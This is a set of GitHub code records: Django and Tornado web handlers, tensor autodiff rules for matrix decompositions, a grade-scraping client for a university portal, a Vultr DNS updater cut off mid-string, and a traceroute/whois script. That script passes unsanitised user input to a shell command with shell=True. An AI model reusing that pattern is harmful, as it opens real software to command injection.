mark_promised(request, action_slug):\n if request.user.has_perm('action.change_attendee'):\n attendee = get_object_or_404(Attendee, pk=request.POST['id'], action__slug=action_slug)\n if not attendee.promised:\n attendee.promised = now()\n attendee.save()\n return JsonResponse({'status': 'ok'})\n\n\n@login_required\n@never_cache\ndef list_proposals(request):\n ctx = {\n 'talks': TalkProposal.objects.select_related('requestor').order_by('-responded', 'created')\n }\n template = 'list_talks'\n if request.GET.get('format', 'html') == 'csv':\n template += '.csv'\n content_type = 'text/csv'\n content_disposition = 'attachment; filename=\"talks.csv\"'\n else:\n template += '.html'\n content_type = 'text/html'\n content_disposition = None\n response = render(request, template, ctx)\n response['content-type'] = content_type\n if content_disposition:\n response['content-disposition'] = content_disposition\n return response\n\n\n\n@login_required\n@never_cache\ndef talk_respond(request, talk_id):\n talk = get_object_or_404(TalkProposal, pk=talk_id)\n if request.method == 'POST' and not talk.responded:\n talk.responded = now()\n talk.responder = request.user\n talk.save()\n return JsonResponse({'id': talk.id})\n\n\n@login_required\n@never_cache\ndef convert_proposal_to_action(request, talk_id):\n talk = get_object_or_404(TalkProposal, pk=talk_id)\n if request.method == 'POST' and talk.responded:\n act = Action()\n act.name = \"XR Talk at {}\".format(talk.location.strip())\n act.when = now() + timedelta(days=7)\n act.public = False\n act.description = '''Heading to extinction (and what to do about it)\n\nThis talk will be at {}\n'''.format(talk.location)\n act.slug = 'xr-talk-%d' % talk.id\n try:\n act.save()\n except IntegrityError:\n act = Action.objects.get(slug=act.slug)\n url = '/admin/actions/action/%d/change/' % act.id\n return JsonResponse({'next': 
url})\n\n","repo_name":"davestgermain/extinctionr","sub_path":"extinctionr/actions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"11175081838","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tadpole.util as util\nimport tadpole.autodiff as ad\nimport tadpole.tensor as tn\n\nimport tadpole.linalg.unwrapped as la\n\nfrom tadpole.index import (\n Index,\n IndexGen, \n IndexLit,\n Indices,\n)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of tensor decompositions ###\n### ###\n###############################################################################\n\n\n# --- Helpers: identity matrix ---------------------------------------------- #\n\ndef eye(x, inds=None): \n\n if inds is None:\n return tn.space(x).eye()\n\n sind = IndexLit(inds[0], x.shape[0])\n sind1 = IndexLit(inds[1], x.shape[-1])\n\n return tn.space(x).eye(sind, sind1)\n\n\n\n\n# --- Helpers: F-matrix ----------------------------------------------------- #\n\ndef fmatrix(s): \n\n seye = eye(s,\"ij\")\n sdiff = s(\"1j\") - s(\"i1\") + seye\n\n return sdiff / (sdiff**2 + 1e-12) - seye\n\n\n\n\n# --- SVD ------------------------------------------------------------------- #\n\ndef vjp_svd(g, out, x, sind=None, trunc=None):\n\n \"\"\"\n https://arxiv.org/pdf/1909.02659.pdf\n\n Eq. 1, 2, 36 (take complex conjugate of both sides)\n\n \"\"\"\n\n du, ds, dv = g[0], g[1], g[2].H\n u, s, v = out[0], out[1], out[2].H\n\n f = fmatrix(s**2)(\"ij\")\n\n uTdu = u.T(\"im\") @ du(\"mj\")\n vTdv = v.T(\"im\") @ dv(\"mj\")\n\n grad = eye(s,\"ij\") * ds(\"i1\") \n grad = grad + f * s(\"1j\") * (uTdu(\"ij\") - uTdu.H(\"ij\")) \n grad = grad + f * s(\"i1\") * (vTdv(\"ij\") - vTdv.H(\"ij\"))\n \n\n if tn.iscomplex(x):\n grad = grad + 1j * tn.imag(eye(uTdu) * uTdu) / s(\"1j\")\n\n\n grad = u.C(\"li\") @ grad(\"ij\") @ v.T(\"jr\") \n\n\n if x.shape[0] < x.shape[1]: \n\n vvH = v(\"bm\") @ v.H(\"mr\")\n grad = grad \\\n + ((u(\"la\") / s(\"1a\")) @ dv.T(\"ab\") @ (eye(vvH) - vvH)).C\n\n return grad(*tn.union_inds(x))\n\n\n if x.shape[0] > x.shape[1]:\n\n uuH = u(\"bm\") @ u.H(\"ml\")\n grad = grad \\\n + ((v(\"ra\") / s(\"1a\")) @ du.T(\"ab\") @ (eye(uuH) - uuH)).T\n\n return grad(*tn.union_inds(x))\n\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Eigendecomposition (general) ------------------------------------------ #\n\ndef vjp_eig(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/1701.00392\n \n Eq. 4.77 (take complex conjugate of both sides)\n\n \"\"\"\n\n dv, ds = g\n v, s = out\n\n f = fmatrix(s)(\"ij\")\n vTdv = v.T(\"im\") @ dv(\"mj\")\n\n grad1 = f * vTdv \n grad2 = f * ((v.T(\"im\") @ v.C(\"mn\")) @ (tn.real(vTdv) * eye(vTdv))(\"nj\"))\n\n grad = ds(\"1j\") * eye(s,\"ij\") + grad1 - grad2\n grad = la.inv(v.T)(\"li\") @ grad(\"ij\") @ v.T(\"jr\")\n \n if not tn.iscomplex(x):\n grad = tn.real(grad)\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Eigendecomposition (Hermitian) ---------------------------------------- #\n\ndef vjp_eigh(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/1701.00392\n \n Eq. 
4.71 (take complex conjugate of both sides)\n\n Comments:\n\n * numpy and pytorch use UPLO=\"L\" by default\n\n * tensorflow always uses UPLO=\"L\"\n https://www.tensorflow.org/api_docs/python/tf/linalg/eigh\n\n \"\"\"\n\n dv, ds = g\n v, s = out\n\n grad = eye(s,\"ij\") * ds(\"i1\")\n\n if not tn.allclose(dv, tn.space(dv).zeros()): \n grad = grad + fmatrix(s)(\"ij\") * (v.T(\"im\") @ dv(\"mj\"))\n\n grad = v(\"li\").C @ grad @ v.T(\"jr\") \n\n tl = la.tril(tn.space(grad).ones(), k=-1)\n grad = tn.real(grad) * eye(grad) \\\n + (grad(\"lr\") + grad.H(\"lr\")) * tl(\"lr\") \n \n return grad(*tn.union_inds(x))\n\n\n\n\n# --- QR decomposition ------------------------------------------------------ #\n\ndef vjp_qr(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/2009.10071\n\n \"\"\"\n\n def trisolve(r, a):\n\n return la.trisolve(r, a.H, which=\"upper\").H\n\n\n def hcopyltu(m):\n\n E = 2 * la.tril(tn.space(m).ones(), k=-1) + tn.space(m).eye()\n m = m * E\n\n return (m(\"ij\") + m.H(\"ij\")) / 2\n\n\n def kernel(q, dq, r, dr):\n\n m = r(\"im\") @ dr.H(\"mj\") - dq.H(\"im\") @ q(\"mj\")\n\n return trisolve(r(\"jr\"), dq(\"lj\") + q(\"li\") @ hcopyltu(m)(\"ij\"))\n\n\n dq, dr = g\n q, r = out\n\n if x.shape[0] >= x.shape[1]:\n return kernel(q, dq, r, dr)(*tn.union_inds(x))\n\n x1, x2 = x[:, : x.shape[0]], x[:, x.shape[0] :]\n r1, r2 = r[:, : x.shape[0]], r[:, x.shape[0] :]\n dr1, dr2 = dr[:, : x.shape[0]], dr[:, x.shape[0] :]\n\n dx1 = kernel(q, dq(\"li\") + x2(\"lr\") @ dr2.H(\"ri\"), r1, dr1)\n dx2 = q(\"li\") @ dr2(\"ir\")\n\n return la.concat(\n dx1(\"ia\"), \n dx2(\"ib\"), \n inds=tuple(tn.union_inds(x)), \n which=\"right\"\n )\n\n\n\n\n# --- LQ decomposition ------------------------------------------------------ #\n\ndef vjp_lq(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/2009.10071\n\n \"\"\"\n\n def trisolve(l, a):\n\n return la.trisolve(l.H, a, which=\"upper\")\n\n\n def hcopyltu(m):\n\n E = 2 * la.tril(tn.space(m).ones(), k=-1) + tn.space(m).eye()\n m = m * E\n\n return (m(\"ij\") + m.H(\"ij\")) / 2\n\n\n def kernel(l, dl, q, dq):\n\n m = l.H(\"im\") @ dl(\"mj\") - dq(\"im\") @ q.H(\"mj\")\n\n return trisolve(l(\"li\"), dq(\"ir\") + hcopyltu(m)(\"ij\") @ q(\"jr\"))\n\n\n dl, dq = g\n l, q = out\n\n if x.shape[0] <= x.shape[1]:\n return kernel(l, dl, q, dq)(*tn.union_inds(x))\n\n x1, x2 = x[: x.shape[1], :], x[x.shape[1] :, :]\n l1, l2 = l[: x.shape[1], :], l[x.shape[1] :, :]\n dl1, dl2 = dl[: x.shape[1], :], dl[x.shape[1] :, :]\n\n dx1 = kernel(l1, dl1, q, dq(\"ir\") + dl2.H(\"il\") @ x2(\"lr\"))\n dx2 = dl2(\"li\") @ q(\"ir\")\n\n return la.concat(\n dx1(\"ai\"), \n dx2(\"bi\"), \n inds=tuple(tn.union_inds(x)), \n which=\"left\"\n )\n\n\n\n\n# --- Record decomp VJPs ---------------------------------------------------- # \n\nad.makevjp(la.svd, vjp_svd)\nad.makevjp(la.eig, vjp_eig)\nad.makevjp(la.eigh, vjp_eigh)\nad.makevjp(la.qr, vjp_qr)\nad.makevjp(la.lq, vjp_lq)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of standard matrix properties and transformations ###\n### ###\n###############################################################################\n\n\n# --- Norm ------------------------------------------------------------------ #\n\ndef vjp_norm(g, out, x, order=None, **opts):\n\n \"\"\"\n https://people.maths.ox.ac.uk/gilesm/files/NA-08-01.pdf\n https://en.wikipedia.org/wiki/Norm_(mathematics)#p-norm\n\n \"\"\"\n\n if order in (None, 'fro'):\n\n return (g / out) * x.C \n\n\n if order == 'nuc':\n\n 
U, S, VH, error = la.svd(x)\n\n return g * (U.C @ VH.C)\n\n\n raise ValueError(\n f\"vjp_norm: invalid norm order {order} provided. The order must \"\n f\"be one of: None, 'fro', 'nuc'.\"\n )\n\n\n\n\n# --- Trace ----------------------------------------------------------------- #\n\ndef vjp_trace(g, out, x, **opts):\n\n return tn.space(x).eye() * g\n\n\n\n\n# --- Determinant ----------------------------------------------------------- #\n\ndef vjp_det(g, out, x):\n\n return g * out * la.inv(x).T\n\n\n\n\n# --- Inverse --------------------------------------------------------------- #\n\ndef vjp_inv(g, out, x):\n\n grad = -out.T(\"ij\") @ g(\"jk\") @ out.T(\"kl\")\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Diagonal -------------------------------------------------------------- #\n\ndef vjp_diag(g, out, x, inds, **opts): \n\n xinds = list(tn.union_inds(x))\n\n i = min(xinds, key=len)\n j = i.retagged(\"j\")\n k = xinds[1 - xinds.index(i)] \n\n grad = (g(i,\"1\") * tn.space(x).eye(i,j)) @ tn.space(x).eye(j,k) \n\n return tn.transpose_like(grad, x)\n\n\n\n\n# --- Concatenate matrices -------------------------------------------------- #\n\ndef vjp_concat(g, adx, out, *xs, inds, which=None, **opts): \n\n axis = {\n None: 0, \n \"left\": 0, \n \"right\": 1,\n }[which]\n \n start = sum([x.shape[axis] for x in xs[:adx]])\n size = xs[adx].shape[axis] \n\n adx_slice = [slice(None), slice(None)]\n adx_slice[axis] = slice(start, start + size)\n\n return g[tuple(adx_slice)](*tn.union_inds(xs[adx])) \n\n\n\n\n# --- Record standard linalg VJPs ------------------------------------------- #\n\nad.makevjp(la.norm, vjp_norm)\nad.makevjp(la.trace, vjp_trace)\nad.makevjp(la.det, vjp_det)\nad.makevjp(la.inv, vjp_inv)\nad.makevjp(la.diag, vjp_diag)\n\nad.makevjp(la.tril, lambda g, out, x, **opts: la.tril(g, **opts))\nad.makevjp(la.triu, lambda g, out, x, **opts: la.triu(g, **opts))\n\nad.makevjp_combo(la.concat, vjp_concat)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of linear algebra solvers ###\n### ###\n###############################################################################\n\n\n# --- Solve the equation ax = b --------------------------------------------- #\n\ndef vjpA_solve(g, out, a, b):\n\n return -la.solve(a.T, g) @ out.T\n\n\ndef vjpB_solve(g, out, a, b):\n\n return la.solve(a.T, g)\n\n\n\n\n# --- Solve the equation ax = b, assuming a is a triangular matrix ---------- #\n\ndef tri(which):\n\n if which is None:\n which = \"upper\"\n\n return {\n \"lower\": la.tril, \n \"upper\": la.triu,\n }[which]\n\n\ndef opposite(which):\n\n if which is None:\n which = \"upper\"\n\n return {\n \"lower\": \"upper\", \n \"upper\": \"lower\",\n }[which]\n\n\ndef vjpA_trisolve(g, out, a, b, which=None):\n\n return -tri(which)(la.trisolve(a.T, g, which=opposite(which)) @ out.T)\n \n\ndef vjpB_trisolve(g, out, a, b, which=None):\n\n return la.trisolve(a.T, g, which=opposite(which))\n\n\n\n\n# --- Record linalg solver VJPs --------------------------------------------- #\n\nad.makevjp(la.solve, vjpA_solve, vjpB_solve)\nad.makevjp(la.trisolve, vjpA_trisolve, vjpB_trisolve)\n \n\n \n\n","repo_name":"dkilda/tadpole","sub_path":"tadpole/tensorwrap/vjps/linalg.py","file_name":"linalg.py","file_ext":"py","file_size_in_byte":10346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74323685609","text":"from ipwhois import IPWhois\nimport subprocess\nimport re\n\n\ndef tracert(name):\n try:\n return subprocess.check_output(r'tracert ' + name, shell=True)\n except subprocess.CalledProcessError:\n print('ошибка tracert')\n\n\ndef who_is(ip):\n try:\n data = IPWhois(ip).lookup_whois()\n return 'ip : ' + ip + '\\n' + \\\n 'ASN : ' + data['asn'] + '\\n' + \\\n 'country : ' + data['asn_country_code'] + '\\n' + \\\n 'provider : ' + data['nets'][0]['description'] + '\\n' + \\\n 'provider address : ' + data['nets'][0]['address'] + '\\n'\n except:\n return ip + ' : ASN - None'\n\n\ndef main():\n pattern = re.compile(r'\\d+\\.\\d+\\.\\d+\\.\\d+')\n while True:\n print(r'введите ip/имя сервера')\n s = input()\n if s == 'exit':\n break\n else:\n raw_data = tracert(s).decode('cp866')\n if raw_data:\n res = [who_is(ip) for ip in pattern.findall(raw_data)[1:]]\n for i in range(1, len(res) + 1):\n print('number :', i)\n print(res[i - 1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DenisBelovED/TracertExtended","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12070063606","text":"# created by WuLei on January 31 2018\n# wuleiatso@gmail.com\n\nimport jwlogin\nimport re\nfrom lxml import etree\n\nclass query(object):\n def __init__(self, session, sessionid):\n self.session = session\n self.sessionid = sessionid\n\n def get_usercode(self):\n url = 'http://202.113.110.22:8088/tjsfjw/custom/js/SetRootPath.jsp'\n header = {'Accept':'*/*',\n 'Accept-Encoding':'gzip, deflate',\n 'Accept-Language':'zh-CN,zh;q=0.9',\n 'Connection':'keep-alive',\n 'Cookie':'JSESSIONID=' + self.sessionid,\n 'Host':'202.113.110.22:8088',\n 'Referer':'http://202.113.110.22:8088/tjsfjw/student/wsxk.pyfadb.html?menucode=JW130713',\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}\n r = self.session.get(url, headers = header)\n self.usercode = re.findall(r'G_USER_CODE = \\'(.*?)\\';', r.text)[0]\n print('user_code: ', self.usercode)\n print('user_name: ', re.findall(r'G_USER_NAME = \\'(.*?)\\';', r.text)[0])\n\n def loadinfo(self):\n url = 'http://202.113.110.22:8088/tjsfjw/student/xscj.stuckcj_data.jsp'\n params = {'sjxz':'sjxz3',\n 'ysyx':'yscj',\n 'zx':'1',\n 'fx':'1',\n 'userCode':str(self.usercode),\n 'xypjwchcnckcj':'0',\n 'pjwchckcjklpbcj':'0',\n 'xn':'2017',\n 'xn1':'2018',\n 'xq':'0',\n 'ysyxS':'on',\n 'sjxzS':'on',\n 'zxC':'on',\n 'fxC':'on',\n 'menucode_current':'JW1314'}\n headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n content = self.session.get(url, params = params, headers = headers)\n return content.text\n\n def parsescores(self, content = None):\n if content == None:\n print('query failed')\n exit(1)\n selector = etree.HTML(content)\n c = selector.xpath('/html/body/table[2]/tbody/tr')\n j=0\n for i in c:\n print(selector.xpath('/html/body/table[2]/tbody/tr[' + str(j+1) + ']/td[2]/text()')[0] +' ' + selector.xpath('/html/body/table[2]/tbody/tr[' + str(j+1) + ']/td[8]/text()')[0])\n j = j + 1\n\n\n def holdconnection(self):\n url = 'http://202.113.110.22:8088/tjsfjw/online/message'\n params = {'hidOption':'getOnlineMessage'}\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n r = self.session.get(url, headers = headers, params = params)\n if r.status_code == 200:\n print('holding connection')\n\ndef go():\n s, sid = jwlogin.go()\n q = query(s, sid)\n q.holdconnection()\n q.get_usercode()\n q.holdconnection()\n q.parsescores(content=q.loadinfo())\n\nif __name__ == '__main__':\n go()","repo_name":"3swu/tjsfjwlogin","sub_path":"queryscores.py","file_name":"queryscores.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20741327089","text":"import functools\nimport random\n\nimport tornado.auth\nimport tornado.escape\nimport tornado.gen\nimport tornado.httpclient\nimport tornado.web\n\nfrom tornado.web import HTTPError\nfrom tornado.web import authenticated\n\nimport peewee\n\nfrom peewee import fn\n\nfrom models import User, Repo, HMap, CSet, Token\nfrom handlers import RequestHandler\n\nclass BaseHandler(RequestHandler):\n \"\"\"Base class for all web front end handlers.\"\"\"\n\n def get_current_user(self):\n uid = self.get_secure_cookie(\"uid\")\n user = User.get(User.id == uid) if uid else None\n return user\n\n def set_current_user(self, user):\n self.set_secure_cookie(\"uid\", str(user.id))\n\n def clear_current_user(self):\n self.clear_cookie(\"uid\")\n\n def write_error(self, status_code, **kwargs):\n if status_code == 404:\n self.render(\"error/404.html\")\n else:\n self.render(\"error/gen.html\")\n\nclass HomeHandler(BaseHandler):\n \"\"\"Renders the website index page - nothing more.\"\"\"\n\n def get(self):\n self.render(\"home/index.html\")\n\nclass SearchHandler(BaseHandler):\n def get(self):\n query = tornado.escape.url_unescape(self.get_argument(\"q\", \"\"))\n\n if query:\n pattern = \"%\" + query + \"%\"\n repos = (Repo.select().join(User).alias(\"user\")\n .where(Repo.name ** pattern))\n users = User.select().where(User.name ** pattern)\n else:\n repos = []\n users = []\n\n self.render(\"search/show.html\", query=query, repos=repos, users=users)\n\nclass UserHandler(BaseHandler):\n def get(self, username):\n try:\n user = User.select().where(User.name == username).get()\n self.render(\"user/show.html\", title=user.name, user=user)\n except User.DoesNotExist:\n raise HTTPError(404)\n\nclass EditUserHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Edit account information\"\n self.render(\"user/edit.html\", title=title, user=user)\n\n @authenticated\n def post(self):\n user = self.current_user\n user.name = self.get_argument(\"username\", None)\n user.homepage_url = self.get_argument(\"homepage\", None)\n user.avatar_url = self.get_argument(\"avatar\", None)\n user.email = self.get_argument(\"email\", None)\n user.save()\n self.redirect(self.reverse_url(\"web:settings\"))\n\nclass RepoHandler(BaseHandler):\n def get(self, username, reponame):\n try:\n repo = (Repo.select().join(User).alias(\"user\")\n .where((User.name == username) & (Repo.name == reponame))\n .get())\n title = repo.user.name + \"/\" + repo.name\n\n timemap = self.get_query_argument(\"timemap\", \"false\") == \"true\"\n datetime = self.get_query_argument(\"datetime\", None)\n key = self.get_query_argument(\"key\", None)\n\n if key and not timemap:\n self.render(\"repo/memento.html\", repo=repo, key=key,\n datetime=datetime)\n elif key and timemap:\n self.render(\"repo/history.html\", repo=repo, key=key)\n else:\n cs = (CSet.select(fn.distinct(CSet.hkey))\n .where(CSet.repo == repo).limit(5).alias(\"cs\"))\n samples = (HMap.select(HMap.val)\n .join(cs, on=(HMap.sha == cs.c.hkey_id)))\n self.render(\"repo/show.html\", title=title, repo=repo,\n samples=list(samples))\n except Repo.DoesNotExist:\n raise HTTPError(404)\n\nclass CreateRepoHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Create a new repository\"\n self.render(\"repo/new.html\", title=title, user=user)\n\n @authenticated\n def post(self):\n reponame = self.get_argument(\"reponame\", None)\n desc = self.get_argument(\"description\", None)\n user = 
self.current_user\n if not reponame:\n self.redirect(self.reverse_url(\"web:create-repo\"))\n return\n repo = Repo.create(user=user, name=reponame, desc=desc)\n self.redirect(self.reverse_url(\"web:repo\", user.name, repo.name))\n\nclass SettingsHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Account settings\"\n self.render(\"settings/index.html\", title=title, user=user,\n tokens=user.tokens)\n\n def on_finish(self):\n q = Token.update(seen=True).where(Token.user == self.current_user)\n q.execute()\n super(SettingsHandler, self).on_finish()\n\nclass NewTokenHandler(BaseHandler):\n @authenticated\n def get(self):\n self.render(\"tokens/new.html\")\n\n @authenticated\n def post(self):\n user = self.current_user\n desc = self.get_argument(\"description\")\n value = \"%040x\" % random.randrange(16**40)\n # TODO: Retry on duplicate token value (peewee.IntegrityError)?\n Token.create(user=user, value=value, desc=desc)\n self.redirect(self.reverse_url(\"web:settings\"))\n\nclass DelTokenHandler(BaseHandler):\n @authenticated\n def post(self, id):\n try:\n token = Token.get((Token.user == self.current_user) & (Token.id == id))\n token.delete_instance()\n self.redirect(self.reverse_url(\"web:settings\"))\n except:\n raise HTTPError(404)\n\nclass JoinHandler(BaseHandler):\n \"\"\"Allows users to join through email and password or GitHub OAuth.\"\"\"\n\n def get(self):\n if not self.current_user:\n self.render(\"join/new.html\")\n else:\n self.redirect(\"/\")\n\n # def post(self):\n # email = self.get_argument(\"email\")\n # name = self.get_argument(\"username\")\n # pass, salt = ...\n # try:\n # User.create(name=username, email=email, pass=pass, salt=salt)\n # except peewee.IntegrityError:\n # self.redirect(self.reverse_url(\"web:join\"))\n # self.redirect(\"/\")\n\nclass AuthHandler(BaseHandler):\n \"\"\"Authenticates users via username and password.\"\"\"\n\n def get(self):\n if not self.current_user:\n self.render(\"auth/new.html\", title=\"Sign in - tailr\")\n else:\n self.redirect(\"/\")\n\n # def post(self):\n # username = self.get_argument(\"username\")\n # user = User.get(User.name == username)\n # # confirm password, else deny access\n # if user... 
== ...:\n # self.set_current_user(user)\n # self.redirect(self.get_argument(\"next\", \"/\"))\n # else:\n # self.redirect(self.reverse_url(\"web:auth\"))\n\nclass GitHubOAuth2Mixin(tornado.auth.OAuth2Mixin):\n \"\"\"GitHub authentication using OAuth2.\"\"\"\n\n _OAUTH_ACCESS_TOKEN_URL = \"https://github.com/login/oauth/access_token\"\n _OAUTH_AUTHORIZE_URL = \"https://github.com/login/oauth/authorize\"\n _OAUTH_SETTINGS_KEY = \"github_oauth\"\n\n _GITHUB_API_BASE_URL = \"https://api.github.com\"\n\n @tornado.auth._auth_return_future\n def get_authenticated_user(self, redirect_uri, code, callback):\n http = self.get_auth_http_client()\n\n body = tornado.auth.urllib_parse.urlencode({\n \"redirect_uri\": redirect_uri,\n \"code\": code,\n \"client_id\": self.settings[self._OAUTH_SETTINGS_KEY][\"key\"],\n \"client_secret\": self.settings[self._OAUTH_SETTINGS_KEY][\"secret\"],\n })\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\",\n }\n\n http.fetch(self._OAUTH_ACCESS_TOKEN_URL,\n functools.partial(self._on_access_token, callback),\n method=\"POST\", headers=headers, body=body)\n\n def _on_access_token(self, future, response):\n if response.error:\n msg = \"GitHub auth error: %s: %s\" % (response.error, response.body)\n future.set_exception(tornado.auth.AuthError(msg))\n return\n\n args = tornado.escape.json_decode(response.body)\n\n self.github_request(\"/user\",\n functools.partial(self._on_user_info, future),\n access_token=args[\"access_token\"])\n\n @tornado.auth._auth_return_future\n def github_request(self, path, callback, access_token=None, **args):\n url = self._GITHUB_API_BASE_URL + path\n\n headers = {\n \"User-Agent\": \"tailr\",\n \"Accept\": \"application/json\",\n }\n\n if access_token is not None:\n headers[\"Authorization\"] = \"token %s\" % access_token\n\n callback = functools.partial(self._on_github_request, callback)\n\n http = self.get_auth_http_client()\n\n http.fetch(url, callback, headers=headers)\n\n def _on_github_request(self, future, response):\n if response.error:\n msg = \"GitHub API error: %s: %s\" % (response.error, response.body)\n future.set_exception(tornado.auth.AuthError(msg))\n return\n\n result = tornado.escape.json_decode(response.body)\n future.set_result(result)\n\n def _on_user_info(self, future, info):\n future.set_result(info)\n\n def get_auth_http_client(self):\n return tornado.httpclient.AsyncHTTPClient()\n\nclass GitHubAuthHandler(BaseHandler, GitHubOAuth2Mixin):\n \"\"\"Authenticates users via GitHub OAuth.\"\"\"\n\n @tornado.gen.coroutine\n def get(self):\n if self.get_argument(\"code\", False):\n info = yield self.get_authenticated_user(\n redirect_uri=self.redirect_uri,\n code=self.get_argument(\"code\"))\n\n github_id = info.get(\"id\", None)\n\n if github_id is None:\n self.redirect(self.reverse_url(\"web:auth\"))\n return\n\n try:\n user = User.get(User.github_id == github_id)\n except User.DoesNotExist:\n user = None\n\n if user is None:\n data = dict(\n name=info.get(\"login\"),\n github_id=github_id,\n homepage_url=info.get(\"html_url\", None),\n avatar_url=info.get(\"avatar_url\", None),\n email=info.get(\"email\", None),\n confirmed=True)\n\n try:\n # try to use the users GitHub login name\n user = User.create(**data)\n except peewee.IntegrityError:\n # assign a temporary, random name\n data[\"name\"] = \"%040x\" % random.randrange(16**40)\n user = User.create(**data)\n\n self.set_current_user(user)\n\n self.redirect(self.get_argument(\"next\", \"/\"))\n else:\n # TODO: pass 
additional random `state` parameter and\n # check the value in the conditional branch above\n yield self.authorize_redirect(\n redirect_uri=self.redirect_uri,\n client_id=self.settings[\"github_oauth\"][\"key\"],\n response_type=\"code\",\n scope=[\"user:email\"])\n\n @property\n def redirect_uri(self):\n return \"%s://%s%s\" % (self.request.protocol,\n self.request.host, \"/auth/github\")\n\nclass DeauthHandler(BaseHandler):\n @authenticated\n def post(self):\n self.clear_current_user()\n self.redirect(\"/\")\n\nclass ErrorHandler(BaseHandler):\n \"\"\"Generates an error response with ``status_code`` for all requests.\"\"\"\n\n def initialize(self, status_code):\n self.set_status(status_code)\n\n def prepare(self):\n super(ErrorHandler, self).prepare()\n raise tornado.web.HTTPError(self.get_status())\n\n def check_xsrf_cookie(self):\n pass\n","repo_name":"pmeinhardt/tlr","sub_path":"handlers/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":11724,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"70035382569","text":"#!/usr/bin/env python3\n'''\nDynamic DNS service for Vultr\nBy Andy Smith\nhttps://ajsmith.us/\nhttps://github.com/andyjsmith/Vultr-Dynamic-DNS\n'''\n\nimport json\nimport sys\nimport requests\n\n# Import the values from the configuration file\nwith open(\"config.json\") as config_file:\n\tconfig = json.load(config_file) # Convert JSON to Python\n\ndomain = config[\"domain\"]\napi_key = config[\"api_key\"]\ndynamic_records = config[\"dynamic_records\"]\n\n# Get the public IP of the server\nip = requests.get(\"https://ip4.seeip.org\").text\ntry:\n\tipv6 = requests.get(\"https://ip6.seeip.org\", timeout=10).text\nexcept (requests.ConnectionError, requests.exceptions.Timeout) as e:\n\tprint(f'Couldn\\'t get IPv6 address, using IPv4 only.')\n\tipv6 = None\n\nresponse = requests.get(\"https://api.vultr.com/v2/domains/{}/records?per_page=500\".format(domain), headers={\"Authorization\": \"Bearer \" + api_key})\n\n# Get the list of DNS records from Vultr to translate the record name to recordid\nraw_response = response.text\nif \"is not authorized\" in raw_response:\n\tprint(\"There was an error. You are not authorized to use the API. Details are below.\")\n\tprint(\"NOTE: If using IPv6, or an IPv6 address is displayed below, you need to go to your account API settings and click Allow all IPv6.\")\n\tprint(\"Error returned from Vultr API:\")\n\ntry:\n\tresponse.raise_for_status()\nexcept requests.HTTPError:\n\tprint(\"Error returned from Vultr API:\")\n\tprint(raw_response)\n\tsys.exit(1)\n\ntry:\n\traw_records = json.loads(raw_response)\nexcept json.decoder.JSONDecodeError:\n\tprint(\"Error returned from Vultr API:\")\n\tprint(raw_response)\n\tsys.exit(1)\n\ndef get_records_to_change(record_type, ip):\n\t# Filter out other records besides A/AAAA records\n\trecords_to_check = [\n\t\trecord\n\t\tfor record in raw_records[\"records\"]\n\t\tif record[\"type\"] == record_type and record[\"name\"] in dynamic_records\n\t]\n\n\trecords_to_change = [\n\t\trecord\n\t\tfor record in records_to_check\n\t\tif record[\"data\"] != ip\n\t]\n\n\tfor record in records_to_change:\n\t\trecord[\"new_ip\"] = ip\n\n\treturn records_to_check, records_to_change\n\ncheck_ipv4, change_ipv4 = get_records_to_change(\"A\", ip)\ncheck_ipv6, change_ipv6 = get_records_to_change(\"AAAA\", ipv6) if ipv6 is not None else ([], [])\n\n# Cancel if no records from Vultr match the config file\nif len(check_ipv4+check_ipv6) == 0:\n\tprint(\"Configuration error, no records to change.\")\n\tsys.exit(1)\n\nrecords_to_change = change_ipv4 + change_ipv6\nif len(records_to_change) == 0:\n\tprint(\"IP address has not changed. 
